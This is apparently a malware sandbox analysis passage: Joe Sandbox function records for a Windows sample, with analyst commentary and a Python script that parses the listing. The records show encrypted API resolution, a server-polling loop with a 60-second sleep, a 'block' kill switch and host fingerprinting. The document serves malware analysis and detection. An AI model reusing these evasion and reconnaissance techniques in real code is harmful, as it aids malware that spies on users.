                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 28ebfe7f3632900716b9ac8fe3dc87350c91d4392fb82685437061c6682aa22f
                          • Instruction ID: bd0ceabb033e94c4bc5b9b4eb182c99b9763f1e2e3b9931f1fd443682186d0b2
                          • Opcode Fuzzy Hash: 28ebfe7f3632900716b9ac8fe3dc87350c91d4392fb82685437061c6682aa22f
                          • Instruction Fuzzy Hash: 91016DB1A04209EBC750DF98DD45FAEFBB8FB04B21F10425AFA55E2380C77459008BA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AE11B7), ref: 00AF7880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AF789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: c80823923fe218e8ef4e0c478c23a5f707b87f59a6c6b7d0bb7c8f85df8a710e
                          • Instruction ID: 3cdca2dd3f43b3ff33d136dec0bdbc2f3317dcaa664119bdf6fdb622eb2ed004
                          • Opcode Fuzzy Hash: c80823923fe218e8ef4e0c478c23a5f707b87f59a6c6b7d0bb7c8f85df8a710e
                          • Instruction Fuzzy Hash: A3F03CB1944208ABC714DF98DD49BAEFBB8EB04711F10065AFA05E2780C77419058BA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 1051fddb45c5f1ae8edadac6f634c123f5905f56a6a185d0a0bb673242fd1ea8
                          • Instruction ID: 852669459870f67e08496bff402af58188c5e9190668e8a5580e4b3442d1cf1f
                          • Opcode Fuzzy Hash: 1051fddb45c5f1ae8edadac6f634c123f5905f56a6a185d0a0bb673242fd1ea8
                          • Instruction Fuzzy Hash: 35D05E7490030CDBCB10DFE5DC496EDBB78FB18311F000658D905A3340EA305482CABA

                          Control-flow Graph

                          control_flow_graph 633 af9c10-af9c1a 634 afa036-afa0ca LoadLibraryA * 8 633->634 635 af9c20-afa031 GetProcAddress * 43 633->635 636 afa0cc-afa141 GetProcAddress * 5 634->636 637 afa146-afa14d 634->637 635->634 636->637 638 afa216-afa21d 637->638 639 afa153-afa211 GetProcAddress * 8 637->639 640 afa21f-afa293 GetProcAddress * 5 638->640 641 afa298-afa29f 638->641 639->638 640->641 642 afa337-afa33e 641->642 643 afa2a5-afa332 GetProcAddress * 6 641->643 644 afa41f-afa426 642->644 645 afa344-afa41a GetProcAddress * 9 642->645 643->642 646 afa428-afa49d GetProcAddress * 5 644->646 647 afa4a2-afa4a9 644->647 645->644 646->647 648 afa4dc-afa4e3 647->648 649 afa4ab-afa4d7 GetProcAddress * 2 647->649 650 afa515-afa51c 648->650 651 afa4e5-afa510 GetProcAddress * 2 648->651 649->648 652 afa612-afa619 650->652 653 afa522-afa60d GetProcAddress * 10 650->653 651->650 654 afa67d-afa684 652->654 655 afa61b-afa678 GetProcAddress * 4 652->655 653->652 656 afa69e-afa6a5 654->656 657 afa686-afa699 GetProcAddress 654->657 655->654 658 afa708-afa709 656->658 659 afa6a7-afa703 GetProcAddress * 4 656->659 657->656 659->658
                          APIs
                          • GetProcAddress.KERNEL32(75550000,01785508), ref: 00AF9C2D
                          • GetProcAddress.KERNEL32(75550000,01785268), ref: 00AF9C45
                          • GetProcAddress.KERNEL32(75550000,01798ED0), ref: 00AF9C5E
                          • GetProcAddress.KERNEL32(75550000,01798EE8), ref: 00AF9C76
                          • GetProcAddress.KERNEL32(75550000,0179CF50), ref: 00AF9C8E
                          • GetProcAddress.KERNEL32(75550000,0179CF68), ref: 00AF9CA7
                          • GetProcAddress.KERNEL32(75550000,0178B2B0), ref: 00AF9CBF
                          • GetProcAddress.KERNEL32(75550000,0179CE30), ref: 00AF9CD7
                          • GetProcAddress.KERNEL32(75550000,0179CE00), ref: 00AF9CF0
                          • GetProcAddress.KERNEL32(75550000,0179CEF0), ref: 00AF9D08
                          • GetProcAddress.KERNEL32(75550000,0179CF08), ref: 00AF9D20
                          • GetProcAddress.KERNEL32(75550000,017852C8), ref: 00AF9D39
                          • GetProcAddress.KERNEL32(75550000,01785228), ref: 00AF9D51
                          • GetProcAddress.KERNEL32(75550000,01785388), ref: 00AF9D69
                          • GetProcAddress.KERNEL32(75550000,01785528), ref: 00AF9D82
                          • GetProcAddress.KERNEL32(75550000,0179CE78), ref: 00AF9D9A
                          • GetProcAddress.KERNEL32(75550000,0179CE48), ref: 00AF9DB2
                          • GetProcAddress.KERNEL32(75550000,0178B2D8), ref: 00AF9DCB
                          • GetProcAddress.KERNEL32(75550000,017853C8), ref: 00AF9DE3
                          • GetProcAddress.KERNEL32(75550000,0179CF20), ref: 00AF9DFB
                          • GetProcAddress.KERNEL32(75550000,0179CDB8), ref: 00AF9E14
                          • GetProcAddress.KERNEL32(75550000,0179CF38), ref: 00AF9E2C
                          • GetProcAddress.KERNEL32(75550000,0179CDD0), ref: 00AF9E44
                          • GetProcAddress.KERNEL32(75550000,017853E8), ref: 00AF9E5D
                          • GetProcAddress.KERNEL32(75550000,0179CDE8), ref: 00AF9E75
                          • GetProcAddress.KERNEL32(75550000,0179CEA8), ref: 00AF9E8D
                          • GetProcAddress.KERNEL32(75550000,0179CE60), ref: 00AF9EA6
                          • GetProcAddress.KERNEL32(75550000,0179CE18), ref: 00AF9EBE
                          • GetProcAddress.KERNEL32(75550000,0179CE90), ref: 00AF9ED6
                          • GetProcAddress.KERNEL32(75550000,0179CEC0), ref: 00AF9EEF
                          • GetProcAddress.KERNEL32(75550000,0179CED8), ref: 00AF9F07
                          • GetProcAddress.KERNEL32(75550000,0179C980), ref: 00AF9F1F
                          • GetProcAddress.KERNEL32(75550000,0179C998), ref: 00AF9F38
                          • GetProcAddress.KERNEL32(75550000,01799D90), ref: 00AF9F50
                          • GetProcAddress.KERNEL32(75550000,0179CA58), ref: 00AF9F68
                          • GetProcAddress.KERNEL32(75550000,0179C848), ref: 00AF9F81
                          • GetProcAddress.KERNEL32(75550000,01785408), ref: 00AF9F99
                          • GetProcAddress.KERNEL32(75550000,0179CAA0), ref: 00AF9FB1
                          • GetProcAddress.KERNEL32(75550000,01785428), ref: 00AF9FCA
                          • GetProcAddress.KERNEL32(75550000,0179C7D0), ref: 00AF9FE2
                          • GetProcAddress.KERNEL32(75550000,0179C8C0), ref: 00AF9FFA
                          • GetProcAddress.KERNEL32(75550000,01785568), ref: 00AFA013
                          • GetProcAddress.KERNEL32(75550000,01785588), ref: 00AFA02B
                          • LoadLibraryA.KERNEL32(0179C938,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA03D
                          • LoadLibraryA.KERNEL32(0179CA10,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA04E
                          • LoadLibraryA.KERNEL32(0179C9B0,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA060
                          • LoadLibraryA.KERNEL32(0179C9C8,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA072
                          • LoadLibraryA.KERNEL32(0179CA88,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA083
                          • LoadLibraryA.KERNEL32(0179CA70,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA095
                          • LoadLibraryA.KERNEL32(0179C9E0,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA0A7
                          • LoadLibraryA.KERNEL32(0179C950,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA0B8
                          • GetProcAddress.KERNEL32(75750000,01785828), ref: 00AFA0DA
                          • GetProcAddress.KERNEL32(75750000,0179C7E8), ref: 00AFA0F2
                          • GetProcAddress.KERNEL32(75750000,01798A78), ref: 00AFA10A
                          • GetProcAddress.KERNEL32(75750000,0179C860), ref: 00AFA123
                          • GetProcAddress.KERNEL32(75750000,017856A8), ref: 00AFA13B
                          • GetProcAddress.KERNEL32(73B30000,0178B148), ref: 00AFA160
                          • GetProcAddress.KERNEL32(73B30000,01785708), ref: 00AFA179
                          • GetProcAddress.KERNEL32(73B30000,0178ADD8), ref: 00AFA191
                          • GetProcAddress.KERNEL32(73B30000,0179C9F8), ref: 00AFA1A9
                          • GetProcAddress.KERNEL32(73B30000,0179CA28), ref: 00AFA1C2
                          • GetProcAddress.KERNEL32(73B30000,01785768), ref: 00AFA1DA
                          • GetProcAddress.KERNEL32(73B30000,01785728), ref: 00AFA1F2
                          • GetProcAddress.KERNEL32(73B30000,0179C8F0), ref: 00AFA20B
                          • GetProcAddress.KERNEL32(757E0000,01785788), ref: 00AFA22C
                          • GetProcAddress.KERNEL32(757E0000,01785908), ref: 00AFA244
                          • GetProcAddress.KERNEL32(757E0000,0179C7B8), ref: 00AFA25D
                          • GetProcAddress.KERNEL32(757E0000,0179C830), ref: 00AFA275
                          • GetProcAddress.KERNEL32(757E0000,01785748), ref: 00AFA28D
                          • GetProcAddress.KERNEL32(758D0000,0178AE50), ref: 00AFA2B3
                          • GetProcAddress.KERNEL32(758D0000,0178B1E8), ref: 00AFA2CB
                          • GetProcAddress.KERNEL32(758D0000,0179C890), ref: 00AFA2E3
                          • GetProcAddress.KERNEL32(758D0000,017858A8), ref: 00AFA2FC
                          • GetProcAddress.KERNEL32(758D0000,017856C8), ref: 00AFA314
                          • GetProcAddress.KERNEL32(758D0000,0178AEC8), ref: 00AFA32C
                          • GetProcAddress.KERNEL32(76BE0000,0179CA40), ref: 00AFA352
                          • GetProcAddress.KERNEL32(76BE0000,01785948), ref: 00AFA36A
                          • GetProcAddress.KERNEL32(76BE0000,01798A58), ref: 00AFA382
                          • GetProcAddress.KERNEL32(76BE0000,0179C800), ref: 00AFA39B
                          • GetProcAddress.KERNEL32(76BE0000,0179C8D8), ref: 00AFA3B3
                          • GetProcAddress.KERNEL32(76BE0000,01785608), ref: 00AFA3CB
                          • GetProcAddress.KERNEL32(76BE0000,01785668), ref: 00AFA3E4
                          • GetProcAddress.KERNEL32(76BE0000,0179C818), ref: 00AFA3FC
                          • GetProcAddress.KERNEL32(76BE0000,0179C8A8), ref: 00AFA414
                          • GetProcAddress.KERNEL32(75670000,01785928), ref: 00AFA436
                          • GetProcAddress.KERNEL32(75670000,0179C908), ref: 00AFA44E
                          • GetProcAddress.KERNEL32(75670000,0179C878), ref: 00AFA466
                          • GetProcAddress.KERNEL32(75670000,0179C920), ref: 00AFA47F
                          • GetProcAddress.KERNEL32(75670000,0179C968), ref: 00AFA497
                          • GetProcAddress.KERNEL32(759D0000,017858C8), ref: 00AFA4B8
                          • GetProcAddress.KERNEL32(759D0000,017857C8), ref: 00AFA4D1
                          • GetProcAddress.KERNEL32(76D80000,01785888), ref: 00AFA4F2
                          • GetProcAddress.KERNEL32(76D80000,0179CCE0), ref: 00AFA50A
                          • GetProcAddress.KERNEL32(6F5C0000,017857A8), ref: 00AFA530
                          • GetProcAddress.KERNEL32(6F5C0000,01785968), ref: 00AFA548
                          • GetProcAddress.KERNEL32(6F5C0000,01785808), ref: 00AFA560
                          • GetProcAddress.KERNEL32(6F5C0000,0179CD40), ref: 00AFA579
                          • GetProcAddress.KERNEL32(6F5C0000,017857E8), ref: 00AFA591
                          • GetProcAddress.KERNEL32(6F5C0000,01785688), ref: 00AFA5A9
                          • GetProcAddress.KERNEL32(6F5C0000,017855C8), ref: 00AFA5C2
                          • GetProcAddress.KERNEL32(6F5C0000,017855E8), ref: 00AFA5DA
                          • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00AFA5F1
                          • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00AFA607
                          • GetProcAddress.KERNEL32(75480000,0179CB30), ref: 00AFA629
                          • GetProcAddress.KERNEL32(75480000,01798B08), ref: 00AFA641
                          • GetProcAddress.KERNEL32(75480000,0179CC68), ref: 00AFA659
                          • GetProcAddress.KERNEL32(75480000,0179CD28), ref: 00AFA672
                          • GetProcAddress.KERNEL32(753B0000,01785868), ref: 00AFA693
                          • GetProcAddress.KERNEL32(6E860000,0179CBF0), ref: 00AFA6B4
                          • GetProcAddress.KERNEL32(6E860000,01785848), ref: 00AFA6CD
                          • GetProcAddress.KERNEL32(6E860000,0179CBD8), ref: 00AFA6E5
                          • GetProcAddress.KERNEL32(6E860000,0179CAE8), ref: 00AFA6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 48fd810cc2bc8f8fb749f389d140d744ac847bb8f13fea5cb23ff8b29ccf44cd
                          • Instruction ID: ff1fd0f7137b9ee33c18e8b01917ac4d2ff6edcf969bb662e5f5e92ea7f4534d
                          • Opcode Fuzzy Hash: 48fd810cc2bc8f8fb749f389d140d744ac847bb8f13fea5cb23ff8b29ccf44cd
                          • Instruction Fuzzy Hash: 9A620AB5500300AFC364DFACEE889667BF9F7AC601714852AE619C3364D7399843DB7A
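The record above is the sample's import-resolution routine: 43 GetProcAddress calls against one already-loaded module handle (75550000), then eight LoadLibraryA calls, then further GetProcAddress batches against each returned handle. In all but two of the 104 calls (InternetSetOptionA and HttpQueryInfoA) the function name is passed as a pointer in the 0178xxxx-0179xxxx range, far above the dumped image regions that start at 00AE0000, which is what you see when names are decrypted into heap memory just before use. The script below is an added example written for this report, not Joe Sandbox or Stealc code: it parses the listing's "• Api.MODULE(args), ref: addr" lines, groups GetProcAddress calls by module handle, separates inline names from pointers and flags pointers that lie outside the image, and also pulls the string literals and the Sleep delay out of the other records on this page. The embedded sample lines are a constructed subset copied from several records, and the image upper bound is an assumption, both labelled in the code.

```python
import re
from collections import defaultdict

# Constructed input: API lines copied from several function records above
# (the 43-call run against handle 75550000 is cut to three entries; lines
# from the C2 loop, the "block" check and the GetUserNameA helper are mixed
# in), so the figures below describe this subset, not one whole function.
SAMPLE_API_LINES = """\
• GetProcAddress.KERNEL32(75550000,01785508), ref: 00AF9C2D
• GetProcAddress.KERNEL32(75550000,01785268), ref: 00AF9C45
• GetProcAddress.KERNEL32(75550000,01798ED0), ref: 00AF9C5E
• LoadLibraryA.KERNEL32(0179C938,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA03D
• GetProcAddress.KERNEL32(6F5C0000,017855E8), ref: 00AFA5DA
• GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00AFA5F1
• GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00AFA607
• GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AF789F
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5644
• StrCmpCA.SHLWAPI(00000000,block), ref: 00AF17C5
• ExitProcess.KERNEL32 ref: 00AF17D1
• Sleep.KERNEL32(0000EA60), ref: 00AF5A1B
"""

# One listing line; the "Part of subcall function X:" prefix and the
# parenthesis-less form used for ExitProcess are both accepted.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX32_RE = re.compile(r"[0-9A-Fa-f]{8}")

# Image bounds from the "Memory Dump Source" lines: base 00AE0000, last
# listed region at 0118A000. Region sizes are not in the report, so the
# upper bound (one 4 KiB page past that start) is an assumption.
IMAGE_LO = 0x00AE0000
IMAGE_HI = 0x0118A000 + 0x1000


def parse_api_lines(text):
    """Turn '• Api.MODULE(args), ref: addr' lines into dicts."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def classify_arg(arg):
    """'pointer' for an 8-digit hex value, 'unknown' for '?', else 'literal'.
    A literal that happens to be 8 hex digits would be misread as a pointer;
    none occurs in this listing."""
    if arg == "?":
        return "unknown"
    return "pointer" if HEX32_RE.fullmatch(arg) else "literal"


def summarize_resolution(calls):
    """Per module handle (first GetProcAddress argument): how many names were
    resolved and whether the name came inline, from inside the image, or
    from memory outside it (runtime-decrypted strings land there)."""
    summary = defaultdict(lambda: {"count": 0, "literal": 0,
                                   "pointer_in_image": 0,
                                   "pointer_outside_image": 0})
    for c in calls:
        if c["api"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        handle, name = c["args"][0], c["args"][1]
        entry = summary[handle]
        entry["count"] += 1
        kind = classify_arg(name)
        if kind == "literal":
            entry["literal"] += 1
        elif kind == "pointer":
            inside = IMAGE_LO <= int(name, 16) < IMAGE_HI
            entry["pointer_in_image" if inside else "pointer_outside_image"] += 1
    return dict(summary)


def string_literals(calls):
    """Inline string arguments grouped by API (ERROR, block, API names...)."""
    out = defaultdict(set)
    for c in calls:
        for a in c["args"]:
            if classify_arg(a) == "literal":
                out[c["api"]].add(a)
    return {k: sorted(v) for k, v in out.items()}


def sleep_seconds(calls):
    """Sleep() takes milliseconds; report each delay in seconds."""
    return [int(c["args"][0], 16) / 1000.0
            for c in calls if c["api"] == "Sleep" and c["args"]]


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for handle, s in sorted(summarize_resolution(calls).items()):
        print(f"handle {handle}: {s}")
    print("literals:", string_literals(calls))
    print("sleep delays (s):", sleep_seconds(calls))
```

Running it on the full 112-line listing above rather than the embedded subset reproduces the per-handle counts in the control-flow graph (43, 5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1, 4) with only the wininet handle (6F5C0000) showing any inline names; a high "pointer_outside_image" count for a function that calls nothing else is the cheapest static tell for a string-decrypting resolver of this kind.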

                          Control-flow Graph

                          control_flow_graph 858 af5510-af5577 call af5ad0 call afa820 * 3 call afa740 * 4 874 af557c-af5583 858->874 875 af55d7-af564c call afa740 * 2 call ae1590 call af52c0 call afa8a0 call afa800 call afaad0 StrCmpCA 874->875 876 af5585-af55b6 call afa820 call afa7a0 call ae1590 call af51f0 874->876 902 af5693-af56a9 call afaad0 StrCmpCA 875->902 906 af564e-af568e call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 875->906 892 af55bb-af55d2 call afa8a0 call afa800 876->892 892->902 907 af56af-af56b6 902->907 908 af57dc-af5844 call afa8a0 call afa820 * 2 call ae1670 call afa800 * 4 call af6560 call ae1550 902->908 906->902 910 af56bc-af56c3 907->910 911 af57da-af585f call afaad0 StrCmpCA 907->911 1037 af5ac3-af5ac6 908->1037 915 af571e-af5793 call afa740 * 2 call ae1590 call af52c0 call afa8a0 call afa800 call afaad0 StrCmpCA 910->915 916 af56c5-af5719 call afa820 call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 910->916 930 af5865-af586c 911->930 931 af5991-af59f9 call afa8a0 call afa820 * 2 call ae1670 call afa800 * 4 call af6560 call ae1550 911->931 915->911 1014 af5795-af57d5 call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 915->1014 916->911 937 af598f-af5a14 call afaad0 StrCmpCA 930->937 938 af5872-af5879 930->938 931->1037 966 af5a28-af5a91 call afa8a0 call afa820 * 2 call ae1670 call afa800 * 4 call af6560 call ae1550 937->966 967 af5a16-af5a21 Sleep 937->967 945 af587b-af58ce call afa820 call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 938->945 946 af58d3-af5948 call afa740 * 2 call ae1590 call af52c0 call afa8a0 call afa800 call afaad0 StrCmpCA 938->946 945->937 946->937 1043 af594a-af598a call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 946->1043 966->1037 967->874 1014->911 1043->937
                          APIs
                            • Part of subcall function 00AFA820: lstrlen.KERNEL32(00AE4F05,?,?,00AE4F05,00B00DDE), ref: 00AFA82B
                            • Part of subcall function 00AFA820: lstrcpy.KERNEL32(00B00DDE,00000000), ref: 00AFA885
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF56A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF5857
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF5228
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5318
                            • Part of subcall function 00AF52C0: lstrlen.KERNEL32(00000000), ref: 00AF532F
                            • Part of subcall function 00AF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00AF5364
                            • Part of subcall function 00AF52C0: lstrlen.KERNEL32(00000000), ref: 00AF5383
                            • Part of subcall function 00AF52C0: lstrlen.KERNEL32(00000000), ref: 00AF53AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF5A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00AF5A1B (0xEA60 = 60000 ms; node 967 in the graph above carries the back edge 967->874, so after a 60 s pause control returns to the request path rather than exiting)
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 17960c7c8f8e7022e480911d02b714765bbb29bbd22bb4f5d5d316f44802464a
                          • Instruction ID: c152176108e5797e50813c6337a2dea05539a64469bfedfa0db71717affd50fb
                          • Opcode Fuzzy Hash: 17960c7c8f8e7022e480911d02b714765bbb29bbd22bb4f5d5d316f44802464a
                          • Instruction Fuzzy Hash: 4BE143B191020C9BCB14FBF4DE56EFD7378AF64340F408518B60B96195EF746A0ACBA2

                          Control-flow Graph

                          control_flow_graph 1069 af17a0-af17cd call afaad0 StrCmpCA 1072 af17cf-af17d1 ExitProcess 1069->1072 1073 af17d7-af17f1 call afaad0 1069->1073 1077 af17f4-af17f8 1073->1077 1078 af17fe-af1811 1077->1078 1079 af19c2-af19cd call afa800 1077->1079 1080 af199e-af19bd 1078->1080 1081 af1817-af181a 1078->1081 1080->1077 1083 af18cf-af18e0 StrCmpCA 1081->1083 1084 af198f-af1999 call afa820 1081->1084 1085 af18ad-af18be StrCmpCA 1081->1085 1086 af1849-af1858 call afa820 1081->1086 1087 af1821-af1830 call afa820 1081->1087 1088 af187f-af1890 StrCmpCA 1081->1088 1089 af185d-af186e StrCmpCA 1081->1089 1090 af1835-af1844 call afa820 1081->1090 1091 af1913-af1924 StrCmpCA 1081->1091 1092 af1932-af1943 StrCmpCA 1081->1092 1093 af18f1-af1902 StrCmpCA 1081->1093 1094 af1951-af1962 StrCmpCA 1081->1094 1095 af1970-af1981 StrCmpCA 1081->1095 1099 af18ec 1083->1099 1100 af18e2-af18e5 1083->1100 1084->1080 1097 af18ca 1085->1097 1098 af18c0-af18c3 1085->1098 1086->1080 1087->1080 1118 af189e-af18a1 1088->1118 1119 af1892-af189c 1088->1119 1116 af187a 1089->1116 1117 af1870-af1873 1089->1117 1090->1080 1103 af1926-af1929 1091->1103 1104 af1930 1091->1104 1105 af194f 1092->1105 1106 af1945-af1948 1092->1106 1101 af190e 1093->1101 1102 af1904-af1907 1093->1102 1107 af196e 1094->1107 1108 af1964-af1967 1094->1108 1110 af198d 1095->1110 1111 af1983-af1986 1095->1111 1097->1080 1098->1097 1099->1080 1100->1099 1101->1080 1102->1101 1103->1104 1104->1080 1105->1080 1106->1105 1107->1080 1108->1107 1110->1080 1111->1110 1116->1080 1117->1116 1120 af18a8 1118->1120 1119->1120 1120->1080
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00AF17C5
                          • ExitProcess.KERNEL32 ref: 00AF17D1 (graph edges 1069->1072 and 1069->1073: the branch after the comparison against "block" goes either straight to ExitProcess or on to the string dispatch at 1073)
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 0458407ee534a36a13d48a5ea1607ac33d5abed2b73eed1f4d4af933edd6b85e
                          • Instruction ID: 7b82d3812474e49a053981263269827d5701021521209686832f1e5aa385ef28
                          • Opcode Fuzzy Hash: 0458407ee534a36a13d48a5ea1607ac33d5abed2b73eed1f4d4af933edd6b85e
                          • Instruction Fuzzy Hash: 4C516CB4A1420EEBCB04DFE4D994BBE7BB5AF54304F108058FA06A7350D7B0D942DBA2

                          Control-flow Graph (basic blocks with their API calls; successors listed after "->")

                          • af7500-af754a: GetWindowsDirectoryA -> af754c, af7553-af75c7
                          • af754c -> af7553-af75c7
                          • af7553-af75c7: GetVolumeInformationA, call af8d00 * 3 -> af75d8-af75df
                          • af75d8-af75df -> af75fc-af7617, af75e1-af75fa
                          • af75e1-af75fa: call af8d00 -> af75d8-af75df (loop)
                          • af75fc-af7617: GetProcessHeap, RtlAllocateHeap -> af7619-af7626, af7628-af7658
                          • af7619-af7626: call afa740 -> af767e-af768e
                          • af7628-af7658: wsprintfA, call afa740 -> af767e-af768e
                          • af767e-af768e
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00AF7542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AF757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF760A
                          • wsprintfA.USER32 ref: 00AF7640
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
